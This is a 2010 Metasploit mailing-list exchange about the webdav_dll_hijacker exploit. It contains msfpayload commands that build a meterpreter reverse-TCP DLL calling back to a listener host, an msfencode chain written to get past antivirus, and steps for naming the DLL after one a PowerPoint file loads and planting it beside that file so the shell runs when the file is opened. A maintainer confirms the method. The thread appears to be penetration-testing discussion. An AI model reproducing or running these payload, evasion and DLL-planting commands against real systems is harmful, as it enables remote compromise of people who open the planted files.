Re: DLL name for webdav_dll_hijacker exploit

[anil saini <imanilsaini () gmail com>]

I have made  a dll using *"./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.1 LPORT=5050 D > /temp/rpawinet.dll"* . The dll is working
and giving me meterpreter shell.

But this dll is caught by almost all anti-virus. I tried encoded this using
./msfencode but then this stoped working.
i used "*./msfpayload windows/meterpreter/reverse_tcp  LHOST=192.168.1.1
LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t dll >
/rpawinet.dll* "

i converted a encoded test.exe into a rpawinet.dll using following command
but that is also not working
*./msfpayload CMD=/test.exe D > /rpawinet.dll*

What wrong i m doing ?
please help.

-Anil Saini

On Mon, Aug 30, 2010 at 8:07 PM, HD Moore <hdm () metasploit com> wrote:

> On 8/29/2010 11:26 PM, anil saini wrote:
> > I m testing *webdav_dll_hijacker i*n metasploit. My exploit is working
> > fine if i use it through net share.
> > But i m facing problems with archives and folders which includes
> > meterpreter payload DLL and file.
> >
> >  My test steps are:-
> >      1. Generate meterpreter payload DLL using msfpayload commad.
> >      2. Rename DLL as DLL mentioned in various forums.(for example for
> > ppt 2007 i m using pptimpconv.dll, pp7x32.dll, rpawinet.dll)
> >      3. Put DLL and file.ppt  in a folder
> >      4. Open file.ppt from folder
> >
> > Same methodology using vbscript and javascript with their associated DLL
> > types is working.
>
> That is the correct way to do it, make sure no background process is
> running for the affected product.
>
> -HD
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework